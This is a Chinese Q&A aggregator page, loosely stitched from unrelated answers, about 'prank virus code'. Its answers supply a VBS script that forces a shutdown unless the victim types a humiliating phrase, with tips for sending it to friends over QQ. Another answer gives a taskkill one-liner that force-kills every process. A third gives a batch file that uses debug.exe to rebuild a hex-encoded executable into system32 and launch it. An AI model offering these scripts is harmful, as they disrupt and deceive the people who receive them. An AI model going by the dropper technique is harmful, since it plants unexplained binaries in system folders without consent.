病毒代码14,冲击波病毒代码是真的吗?

维修要闻     2020-12-24    浏览:16

冲击波病毒代码是真的吗?
执行 cl.exe 时出错.
CF错误代码14-1是啥意思
我遇到和你一样的问题, 自从更新到6.0, 在游戏中杀人过多, 排名第一,就会出现错误代码14-1, 妈的我到腾讯上查了,凡是提这问题都被锁帖。 这个不是G问题, 也不是重病毒,重装游戏也没用。 只有等腾讯出来更新了
能不能给我一个病毒代码,对电脑没害,只让计算机重启一下就行~!!
on error resume next dim WSHshellA set WSHshellA = wscript.createobject("wscript.shell") WSHshellA.run "cmd.exe /c shutdown -r -t 60 -c ""说我是猪,不说我是猪就一分钟关你机,不信,试试···"" ",0 ,true dim a do while(a <> "我是猪") a = inputbox ("说我是猪,就不关机,快撒,说 ""我是猪"" ","说不说","不说",8000,7000) msgbox chr(13) + chr(13) + chr(13) + a,0,"MsgBox" loop msgbox chr(13) + chr(13) + chr(13) + "早说就行了嘛" dim WSHshell set WSHshell = wscript.createobject("wscript.shell") WSHshell.run "cmd.exe /c shutdown -a",0 ,true msgbox chr(13) + chr(13) + chr(13) + "哈哈哈哈,一切皆有可能~" 复制之后呢,把后缀修改为.vbs或者改变打开方式为应用程序,这样你再压缩下用QQ发给你朋友,对方打开了就在60秒内要关闭计算机, 结素任务都不行,他只能说他是猪才能解决问题。够坏吧? 注意哦,你可以把我是猪那个修改成任意想说的话,要是对付你喜欢的人, 就修改成 我爱你 这样他只有说我爱你之后才不关闭计算机哦 也可以把时间修改为20 就是说打开了20秒就关了,还没等对方打完就关机了 是不是叫对方很郁闷呢?
使计算机关机的玩笑病毒代码
打开个txt,输入
shutdown-l-o
另存为*.cmd,双击,不过这太白痴了
这样更好
taskkill/f/im*.exe&shutdown-l-o1>nul2>nul
这也白痴,想开玩笑不一定关机,我弄过一个脚本,
@echoe1004D5A90000300000004000000FFFF0000>>tmp11
@echoe110B8000000000000004000000000000000>>tmp11
@echoe12000000000000000000000000000000000>>tmp11
@echoe130000000000000000000000000C8000000>>tmp11
@echoe1400E1FBA0E00B409CD21B8014CCD215468>>tmp11
@echoe15069732070726F6772616D2063616E6E6F>>tmp11
@echoe160742062652072756E20696E20444F5320>>tmp11
@echoe1706D6F64652E0D0D0A2400000000000000>>tmp11
@echoe180E781B5C3A3E0DB90A3E0DB90A3E0DB90>>tmp11
@echoe190B0E88690A1E0DB9020E88690A0E0DB90>>tmp11
@echoe1A0A3E0DA90AAE0DB90A6EC8490A1E0DB90>>tmp11
@echoe1B0A6EC8190A2E0DB9052696368A3E0DB90>>tmp11
@echoe1C00000000000000000504500004C010300>>tmp11
@echoe1D0FD19073F0000000000000000E0000F01>>tmp11
@echoe1E00B01070A000200000004000000000000>>tmp11
@echoe1F0C0100000001000000020000000004000>>tmp11
@echoe20000100000000200000400000000000000>>tmp11
@echoe21004000000000000000040000000040000>>tmp11
@echoe22000000000020000040000100000100000>>tmp11
@echoe23000001000001000000000000010000000>>tmp11
@echoe24000000000000000004C2000003C000000>>tmp11
@echoe25000000000000000000000000000000000>>tmp11
@echoe26000000000000000000000000000000000>>tmp11
@echoe270302000001C0000000000000000000000>>tmp11
@echoe28000000000000000000000000000000000>>tmp11
@echoe29000000000000000000000000000000000>>tmp11
@echoe2A0002000002C0000000000000000000000>>tmp11
@echoe2B000000000000000000000000000000000>>tmp11
@echoe2C02E746578740000008601000000100000>>tmp11
@echoe2D000020000000400000000000000000000>>tmp11
@echoe2E000000000200000602E72646174610000>>tmp11
@echoe2F098010000002000000002000000060000>>tmp11
@echoe30000000000000000000000000040000040>>tmp11
@echoe3102E646174610000002800000000300000>>tmp11
@echoe32000020000000800000000000000000000>>tmp11
@echoe33000000000400000C00000000000000000>>tmp11
@echoe500568B74240857681030400056FF151020>>tmp11
@echoe51040008B0D1030400083F9CE8B15183040>>tmp11
@echoe520008B3D24304000A1143040007D2183F8>>tmp11
@echoe530CE7C216A056A006A0083E80A50516A00>>tmp11
@echoe54056A314304000FF150C2040005F5EC383>>tmp11
@echoe550F8CE7D0E538D5F323BD35B7F0583C10A>>tmp11
@echoe560EB3983C7323BD77E2F8B15203040008B>>tmp11
@echoe5703D1C30400083C2323BFA7F1C6A056A00>>tmp11
@echoe5806A0083C00A50516A0056A314304000FF>>tmp11
@echoe590150C2040005F5EC383E90A6A056A006A>>tmp11
@echoe5A00050516A0056890D10304000FF150C20>>tmp11
@echoe5B040005F5EC3CCCCCCCCCCCCCCCCCCCCCC>>tmp11
@echoe5C0566810304000FF152420400050FF1510>>tmp11
@echoe5D0204000A1183040008B0D1C3040008B35>>tmp11
@echoe5E0202040006891000000A324304000890D>>tmp11
@echoe5F020304000FFD6A8017560538B1D1C2040>>tmp11
@echoe60000558B2D18204000578B3D1420400090>>tmp11
@echoe610FFD750E8E8FEFFFF83C4046A00FFD350>>tmp11
@echoe620E8DBFEFFFF83C404E83600000099F73D>>tmp11
@echoe6302030400052E82900000099F73D243040>>tmp11
@echoe6400052FFD56A14FF150020400068910000>>tmp11
@echoe65000FFD6A80174B95F5D5B6A00FF150420>>tmp11
@echoe66040005EA10030400069C0FD43030005C3>>tmp11
@echoe6709E2600A30030400033C066A102304000>>tmp11
@echoe68025FF7F0000C300000000000000000000>>tmp11
@echoe700C2200000B420000000000000D8200000>>tmp11
@echoe710E8200000F82000000E2100001E210000>>tmp11
@echoe7202E2100003C2100000000000000000000>>tmp11
@echoe73000000000FD19073F0000000002000000>>tmp11
@echoe73000000000FD19073F0000000002000000>>tmp11
@echoe7403C0000005C2100005C07000088200000>>tmp11
@echoe7500000000000000000CA20000000200000>>tmp11
@echoe76094200000000000000000000050210000>>tmp11
@echoe7700C200000000000000000000000000000>>tmp11
@echoe7800000000000000000C2200000B4200000>>tmp11
@echoe79000000000D8200000E8200000F8200000>>tmp11
@echoe7A00E2100001E2100002E2100003C210000>>tmp11
@echoe7B000000000AF004578697450726F636573>>tmp11
@echoe7C073004703536C656570004B45524E454C>>tmp11
@echoe7D033322E646C6C0000830253657457696E>>tmp11
@echoe7E0646F77506F730000740147657457696E>>tmp11
@echoe7F0646F7752656374001701476574466F72>>tmp11
@echoe8006567726F756E6457696E646F77004F02>>tmp11
@echoe810536574437572736F72506F7300006301>>tmp11
@echoe820476574546F7057696E646F7700002101>>tmp11
@echoe8304765744B65795374617465000E014765>>tmp11
@echoe840744465736B746F7057696E646F770000>>tmp11
@echoe8505553455233322E646C6C000052534453>>tmp11
@echoe86015F468A63F1BF64A85E8678B58CAE204>>tmp11
@echoe87002000000663A5C50726F6A656374735C>>tmp11
@echoe88046656173745C52656C656173655C4665>>tmp11
@echoe8906173742E706462000000000000000000>>tmp11
@echorcx>>tmp11
@echoA00>>tmp11
@echontmp1>>tmp11
@echow>>tmp11
@echoq>>tmp11
@debug<tmp11
@Copy/b/ytmp1%systemroot%system32Feast.exe
@start%systemroot%system32Feast.exe
@deltmp11
@deltmp1
把这些写道txt里面,另存为文件名.bat,双击运行,绝对的joke,很好玩的哦~
这两个都不是病毒。
-绝对原创答案

相关搜索

相似文章